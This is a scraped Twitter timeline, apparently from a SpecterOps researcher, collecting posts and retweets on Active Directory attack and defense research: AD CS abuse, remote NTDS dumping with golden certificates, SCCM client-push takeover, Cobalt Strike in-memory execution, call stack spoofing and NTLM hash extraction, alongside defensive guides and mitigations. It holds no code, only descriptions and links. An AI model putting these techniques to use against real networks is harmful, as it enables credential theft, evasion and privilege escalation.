5 months ago and I started looking into the security of Active Directory Certificate Services. Today we're releasing the results of that research- a blog post posts.specterops.io/certified-pre- + a 140-page whitepaper and defensive audit tool (links at the top of the post) [1/6]
Follow
Will Schroeder
@harmj0y
Will Schroeder’s Tweets
#FF Charlie Bromberg ().
● Charlie has been consistently putting out high-quality signal for several years.
● You can find a lot of it as his site, thehacker.recipes
● He's made HUGE contributions to FOSS projects, including #BloodHound.
Give him a follow!
6
12
62
✅ I nominated and for their awesome contributions and guidance in the past months and years. I wished I could nominate other awesome contributors like and more, but I was limited to 3
5
5
25
Show this thread
New technique to dump NTDS remotely WITHOUT DSRUAPI: github.com/zblurx/certsync (Golden Certificates + UnPAC the hash automation)
Thanks for certipy, which my script heavily relies on.
6
191
427
Have you ever wondered how RODCs work and whether compromising one would necessarily allow for privilege escalation?
The answers are in my new post:
At the Edge of Tier Zero: The Curious Case of the RODC
2
194
605
Of course it's disputed... 😅 #keepass
Do not forget policies..., enforced ones !
> keepass.info/help/kb/config
"Disable trigger system" / "Disable trigger system, delete user triggers" + <ExportNoKey>false</ExportNoKey>
This Tweet is unavailable.
2
19
78
This looks like an incredible piece of work, can't wait to try it out!
Quote Tweet
I’m pleased to release Inline-Execute-PE, a CobaltStrike toolkit enabling users to load and repeatedly run unmanaged Windows exe’s in Beacon memory without dropping to disk or creating a new process each time. github.com/Octoberfest7/I
#redteam #cybersecurity #malware
1
2
18
A great overview of what Windows Services are, how they work, and what weaknesses or abilities they can provide attackers
Quote Tweet
Today @v3r5ace and I are releasing the 2nd installment of The Defender's Guide! In this blog we walk through Windows Services!
Medium Link: posts.specterops.io/the-defenders-
Github Link: github.com/Defenders-Guid
1
27
116
Show this thread
Today and I are releasing the 2nd installment of The Defender's Guide! In this blog we walk through Windows Services!
Medium Link: posts.specterops.io/the-defenders-
Github Link: github.com/Defenders-Guid
4
66
197
SCCM takeover by abusing automatic client push installation has less requirements than I thought. Check this post out for a detailed walkthrough and recommendations. Install KB15599094 and disable NTLM for client push installation to prevent this attack.
3
181
409
Replying to
If no events were generated it's a blindspot.
If there were events and no alerts then it's a lack of coverage of that specific technique(s).
If there were detections claiming to detect said technique(s) and no alert was triggered then it's an evasion
3
25
Elastic Agent's memory scanning feature is cool.
8
18
188
Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.
🧑🍳 The Hacker Recipes thehacker.recipes/ad/movement/da
13
246
707
Show this thread
The year is winding down! SpecterOps is closing for the next two weeks, but you can still register for our March training courses if you still have some last-second holiday shopping to do. ghst.ly/march2023
1
5
Happy Holidays from all of us here at SpecterOps! Our offices are closed December 26th-January 9th to allow our team to relax and spend some extended time with their loved ones (and their presents!) We look forward to what's to come in 2023.
1
5
20
ICYMI: dropped a new blog post today: Passwordless Persistence and Privilege Escalation in Azure
You can read it here:
2
69
151
There is now a BloodHound Enterprise app on splunkbase!
splunkbase.splunk.com/app/6609
#BloodHound #Splunk
5
24
Welcome to the new AD Mindmap upgrade !
v2022_11 will be dark only (this is too painful to maintain two versions).
Thx again to : and for their help 👍
Full quality and zoomable version here :
orange-cyberdefense.github.io/ocd-mindmaps/i
Overview :
40
479
1,216
Show this thread
[RELEASE] After a little wait, I'm happy to present SilentMoonwalk, a PoC implementation of a TRUE call stack spoofer, result of a joint research on an original technique developed by namazso, done with my friends and .
Enjoy! ;)
12
211
469
Show this thread
Attending #BHEU this week? So are we! Come by Booth 506 to find out more about our services, trainings, and #BloodHoundEnterprise.
3
6
I wrote a blog post that talks about how we can abuse yet another Chrome Remote Debugging feature to "stalk" end users.
2
49
78
Show this thread
Tickets are on sale for our Adversary Tactics: Red Team Operations, Detection, and Tradecraft Analysis courses taking place virtually March 7 - 10, 2023. Register today! ghst.ly/march2023
5
12
🧵 (1/x) I know you love #pentest stories, so here’s one of those ⬇️
There’s a non-DC computer (Victim) that is a member of the Exchange Trusted Subsytem group and has DCSync privs. The WebClient is ON but the MAQ=0 and domain functional level is 2012 R2 which prevents us ⤵️
15
164
510
Show this thread
I plan on seeing how Twitter fares but I'm excited to see how infosec.exchange evolves! Infosec has been my main use for Twitter over the last decade, so I want to make sure I interact with my community where it makes the most sense
9
Show this thread
As promised the code for and my POC (WonkaVision). Just to reiterate, this isn't intended to be a production-ready enterprise application, but to generate ideas on forged ticket detections and publicize discovered IOAs:
39
80
I've always thought that in order for Defenders to be truly effective, it is vital they know where the telemetry they are leveraging is coming from.
Today I am releasing a project called TelemetrySource that is meant to support that cause.
Blog:
7
188
372
Show this thread
1) We are finally propagating MotW to Virtual Disk containers! For example, when you download and mount an ISO from the Internet, applications that query the zone of files inside of that ISO will receive the zone of the ISO itself. 3/7
3
39
87
Show this thread
The latest episode of The Hacker Factory Podcast just dropped featuring 's very own Justin Kohler! An Podcast #podcast
9
19
SpecterOps observes Election day as a company holiday. We are closed today to allow our employees every opportunity to cast their ballots.
"Voting is not only our right - it is our power." -Loung Ung
11
35
and I have started a blogpost series providing a defensive knowledgeable for commonly attacked technologies - we started with the Windows Registry which was released today - check it out over at the Medium!
5
127
296
I made a crappy C# to extract NetNTLMv2 hashes from .etl captures (e.g. using PktMon native driver). Idea adapted from NTLMRawUnHide ()
github.com/X-C3LL/SharpNT
2
85
281
The video for my talk is now up! In this talk:
1. What problems we are solving
2. Attacking Azure with graphs
3. Defending Azure with graphs
With plenty of demos. Check it out here:
1
55
163